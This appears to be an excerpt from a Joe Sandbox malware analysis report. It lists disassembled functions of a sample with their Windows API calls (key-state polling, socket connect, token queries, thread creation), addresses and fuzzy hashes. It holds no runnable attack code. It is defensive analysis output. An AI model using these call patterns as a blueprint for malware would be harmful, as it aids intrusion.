                                                                        • Instruction ID: 14c844c9296eac7570be7e3d083fed5c538f56a15c4af88c5b6604f802e48655
                                                                        • Opcode Fuzzy Hash: 914c213bfd94cb6c4588e82596090f4bc2032729cf4ac322dd5b09570f43b8bd
                                                                        • Instruction Fuzzy Hash: 4C410C35600509DFDB01EF64C981EAEBBF5FF48314B148095E94AAB3A2DB31ED41DB51
                                                                        APIs
                                                                        • GetCursorPos.USER32(000000FF), ref: 0090B64F
                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0090B66C
                                                                        • GetAsyncKeyState.USER32(00000001), ref: 0090B691
                                                                        • GetAsyncKeyState.USER32(00000002), ref: 0090B69F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                        • String ID:
                                                                        • API String ID: 4210589936-0
                                                                        • Opcode ID: 93d211007e79dbfd029f8f1f7c557558e6d0ede6ec2824a51b22b22001ab9439
                                                                        • Instruction ID: 231b38c4770dee2054276c78e1e1c0c460eeabce222e84d2d1a5244a2ccdde59
                                                                        • Opcode Fuzzy Hash: 93d211007e79dbfd029f8f1f7c557558e6d0ede6ec2824a51b22b22001ab9439
                                                                        • Instruction Fuzzy Hash: FA418D35A09109FFCF159F64C844AE9BBB8BF45324F204319F829A62D0CB31A994DFA1
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0092B369
                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 0092B413
                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0092B41B
                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 0092B429
                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0092B431
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleep$RectWindow
                                                                        • String ID:
                                                                        • API String ID: 3382505437-0
                                                                        • Opcode ID: 87f3579472c2b02a33c669c128d625f2f54b03496ffc2933a9ea1c57a4727613
                                                                        • Instruction ID: 3c4bd37f22994b3e276fc5c9f0a43e0b85e03ddea4e5e5199d0ced6c3695be8c
                                                                        • Opcode Fuzzy Hash: 87f3579472c2b02a33c669c128d625f2f54b03496ffc2933a9ea1c57a4727613
                                                                        • Instruction Fuzzy Hash: E931E072905229EBDF04CF68ED4CA9E3BB5EF40325F004229F924A61D1C3B09954DB90
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0092DBD7
                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0092DBF4
                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0092DC2C
                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0092DC52
                                                                        • _wcsstr.LIBCMT ref: 0092DC5C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                        • String ID:
                                                                        • API String ID: 3902887630-0
                                                                        • Opcode ID: 6f073f06838356c90804f222906fbf89813c7d502fe77efbbdbd3989d495ee16
                                                                        • Instruction ID: 0a9c07c7f567c656875c358e3d28dd51340ffe00e6e59659eaa23658a1290e73
                                                                        • Opcode Fuzzy Hash: 6f073f06838356c90804f222906fbf89813c7d502fe77efbbdbd3989d495ee16
                                                                        • Instruction Fuzzy Hash: 73212972209114BFEB259F39EC49E7B7BACDF85760F104039F80DDA195EAA5CD41D2A0
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0095DEB0
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0095DED4
                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0095DEEC
                                                                        • GetSystemMetrics.USER32(00000004), ref: 0095DF14
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00943A1E,00000000), ref: 0095DF32
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 2294984445-0
                                                                        • Opcode ID: 3a5c872a710e7fa2300edbef0d1c9387bd8de20a0614af79bdcfaf48b1742d4c
                                                                        • Instruction ID: 29a7e6ad8160de7bf104e6e559d43c5648d38377dea2e45c07a3db7f88bf98eb
                                                                        • Opcode Fuzzy Hash: 3a5c872a710e7fa2300edbef0d1c9387bd8de20a0614af79bdcfaf48b1742d4c
                                                                        • Instruction Fuzzy Hash: 3E21B231626212AFCB308F7ADC49B6A37A8FF15336F150724FD26C61E0D73098589B80
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0092BC90
                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0092BCC2
                                                                        • __itow.LIBCMT ref: 0092BCDA
                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0092BD00
                                                                        • __itow.LIBCMT ref: 0092BD11
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: 309988fc567f408b0a6151c034125265e8489913df5d04590a62e4fe2b74dc65
                                                                        • Instruction ID: 25195e289802e2edb1535ce6e62b55647ba11e7680f1220783bf9b651912a153
                                                                        • Opcode Fuzzy Hash: 309988fc567f408b0a6151c034125265e8489913df5d04590a62e4fe2b74dc65
                                                                        • Instruction Fuzzy Hash: E321C6767006287BDB10AA69AC46FDE7BBDEF89710F500025FA45EB1C1EB70894587A1
                                                                        APIs
                                                                          • Part of subcall function 008F50E6: _wcsncpy.LIBCMT ref: 008F50FA
                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,009360C3), ref: 00936369
                                                                        • GetLastError.KERNEL32(?,?,?,009360C3), ref: 00936374
                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009360C3), ref: 00936388
                                                                        • _wcsrchr.LIBCMT ref: 009363AA
                                                                          • Part of subcall function 00936318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009360C3), ref: 009363E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                        • String ID:
                                                                        • API String ID: 3633006590-0
                                                                        • Opcode ID: 74fba62b04f12f96dd2319ab2851976b8b6960649f7bb7abbf2ef6325092f75b
                                                                        • Instruction ID: 08cc59c44140d9ffc3cfa607f05afaed7dfa5117dbb21ef3d339e038d5e26990
                                                                        • Opcode Fuzzy Hash: 74fba62b04f12f96dd2319ab2851976b8b6960649f7bb7abbf2ef6325092f75b
                                                                        • Instruction Fuzzy Hash: EB216A31609209ABDB24AB78AC52FFA33ACEF063A0F108465F049C70C0EF64DAC18E55
                                                                        APIs
                                                                          • Part of subcall function 0094A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0094A84E
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00948BD3
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00948BE2
                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00948BFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 3701255441-0
                                                                        • Opcode ID: d2239ee9ac860bb901b8df28756125b830f399e0a52375e5da0a398983845a60
                                                                        • Instruction ID: 1fa76aee30b8bf2097dfabcdba0b3eb826afdb76062c156ec39d11d324bb4cfd
                                                                        • Opcode Fuzzy Hash: d2239ee9ac860bb901b8df28756125b830f399e0a52375e5da0a398983845a60
                                                                        • Instruction Fuzzy Hash: 262160722002149FDB14AF68CD86F7E77A9EF88711F044459F956EB3D2CB74AC418B51
                                                                        APIs
                                                                        • IsWindow.USER32(00000000), ref: 00948441
                                                                        • GetForegroundWindow.USER32 ref: 00948458
                                                                        • GetDC.USER32(00000000), ref: 00948494
                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 009484A0
                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 009484DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ForegroundPixelRelease
                                                                        • String ID:
                                                                        • API String ID: 4156661090-0
                                                                        • Opcode ID: 4a0a69438ee922348b4baa74874b160624b72521da9c879f275a3312fc2b328b
                                                                        • Instruction ID: ec303ea11ec74cf7af14cbd0dea7d6f167885b9e3faa8c1f0295ae3c0f6fa47c
                                                                        • Opcode Fuzzy Hash: 4a0a69438ee922348b4baa74874b160624b72521da9c879f275a3312fc2b328b
                                                                        • Instruction Fuzzy Hash: A5218476A00204AFD704EFA4C845A6EB7F5EF88301F148879F95997251DB70AD40DB90
                                                                        APIs
                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0090AFE3
                                                                        • SelectObject.GDI32(?,00000000), ref: 0090AFF2
                                                                        • BeginPath.GDI32(?), ref: 0090B009
                                                                        • SelectObject.GDI32(?,00000000), ref: 0090B033
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                        • String ID:
                                                                        • API String ID: 3225163088-0
                                                                        • Opcode ID: 239ba28364d8cbe091ba80bdeacd41070407738be633e9b7dcc2ea8a13c66b55
                                                                        • Instruction ID: 11158ea56fcc8a991b29c0de6e9b3aeaeab3e8f7159ea1b038ac0f95ceab05fa
                                                                        • Opcode Fuzzy Hash: 239ba28364d8cbe091ba80bdeacd41070407738be633e9b7dcc2ea8a13c66b55
                                                                        • Instruction Fuzzy Hash: 7A21C2B2828305EFDB10DF54ED58BAA7B7CBB10365F54432AF424A21E0D3704881EF90
                                                                        APIs
                                                                        • __calloc_crt.LIBCMT ref: 009121A9
                                                                        • CreateThread.KERNEL32(?,?,009122DF,00000000,?,?), ref: 009121ED
                                                                        • GetLastError.KERNEL32 ref: 009121F7
                                                                        • _free.LIBCMT ref: 00912200
                                                                        • __dosmaperr.LIBCMT ref: 0091220B
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                        • String ID:
                                                                        • API String ID: 2664167353-0
                                                                        • Opcode ID: 75cd3be89f25784677113f32e4c422258dd44fcff55a100c5eb77f9358fc35bb
                                                                        • Instruction ID: b4f4a6be6496095b3f4a593dbc9a51b25c1df3c4601294d9119eebd8bb572cbd
                                                                        • Opcode Fuzzy Hash: 75cd3be89f25784677113f32e4c422258dd44fcff55a100c5eb77f9358fc35bb
                                                                        • Instruction Fuzzy Hash: D611E53330830E6F9B15BFA49C41EEF7BA8EF857607100429F92886141DB3198E186A0
                                                                        APIs
                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0092ABD7
                                                                        • GetLastError.KERNEL32(?,0092A69F,?,?,?), ref: 0092ABE1
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,0092A69F,?,?,?), ref: 0092ABF0
                                                                        • HeapAlloc.KERNEL32(00000000,?,0092A69F,?,?,?), ref: 0092ABF7
                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0092AC0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 842720411-0
                                                                        • Opcode ID: 10e6a5e29c954e1d027883e7ba70e6837ea1385a415960e1a9e418370090ad29
                                                                        • Instruction ID: 8cd24b1081fd87f00cb4a25591cafb8521120df08302e09785940c66362c255c
                                                                        • Opcode Fuzzy Hash: 10e6a5e29c954e1d027883e7ba70e6837ea1385a415960e1a9e418370090ad29
                                                                        • Instruction Fuzzy Hash: 99013C72219214BFDB148FA9EC48DAB3BBDEF8A7557100429F949D3260DA71DC80DF61
                                                                        APIs
                                                                        • CLSIDFromProgID.OLE32 ref: 00929ADC
                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 00929AF7
                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00929B05
                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00929B15
                                                                        • CLSIDFromString.OLE32(?,?), ref: 00929B21
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 3897988419-0
                                                                        • Opcode ID: de5d0a39919787420e1013febce0b2b94d14cf7e76a56f72504f5d0327afbb1a
                                                                        • Instruction ID: 43bde65ade5953db1befec87b04faacccca3e0b1210bd841540d10bac9771328
                                                                        • Opcode Fuzzy Hash: de5d0a39919787420e1013febce0b2b94d14cf7e76a56f72504f5d0327afbb1a
                                                                        • Instruction Fuzzy Hash: 5B01A276A11228BFDB104F54FC44B9A7BFDEF48351F144028F909D2210D771DD40ABA0
                                                                        APIs
                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00937A74
                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00937A82
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00937A8A
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00937A94
                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00937AD0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                        • String ID:
                                                                        • API String ID: 2833360925-0
                                                                        • Opcode ID: 060a07e3ab33f1040ffe9ca59cc332061b69ab4b1e81684de3fe972e164acf18
                                                                        • Instruction ID: bbeee544bec0cc48205181d30c5b87689101a3d0ab6a0a8aefac1030059e383d
                                                                        • Opcode Fuzzy Hash: 060a07e3ab33f1040ffe9ca59cc332061b69ab4b1e81684de3fe972e164acf18
                                                                        • Instruction Fuzzy Hash: 2B0135B6C09619EBDF14ABE4DC49AEDFB78FF08311F400445E402F2250DB3096909BA1
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0092AADA
                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0092AAE4
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0092AAF3
                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0092AAFA
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0092AB10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: 6fa6885ae4cc1bada33a72812f30077341c48cb51553f847eeb3dca4b4968083
                                                                        • Instruction ID: a1afeeb6f009a5bac2ccee4f242627792587fc7efec785afd24e70099274d876
                                                                        • Opcode Fuzzy Hash: 6fa6885ae4cc1bada33a72812f30077341c48cb51553f847eeb3dca4b4968083
                                                                        • Instruction Fuzzy Hash: C9F04F72215318AFEB110FA4EC88E673B7DFF46754F100029F945D7190CA619841DA61
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0092AA79
                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0092AA83
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0092AA92
                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0092AA99
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0092AAAF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: a16848cfc0b66fff7fbd7598294a2a19e6aa66a33f67d3af82ac8a94b0294545
                                                                        • Instruction ID: f95735e778d80599745a5e3bcb2f0d0e4a138b70a187e78e65973ecb519a1b39
                                                                        • Opcode Fuzzy Hash: a16848cfc0b66fff7fbd7598294a2a19e6aa66a33f67d3af82ac8a94b0294545
                                                                        • Instruction Fuzzy Hash: 47F0C232215314AFEB101FA4EC88E673BBDFF49754F000429F905D7190DB609C82DB61
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0092EC94
                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0092ECAB
                                                                        • MessageBeep.USER32(00000000), ref: 0092ECC3
                                                                        • KillTimer.USER32(?,0000040A), ref: 0092ECDF
                                                                        • EndDialog.USER32(?,00000001), ref: 0092ECF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
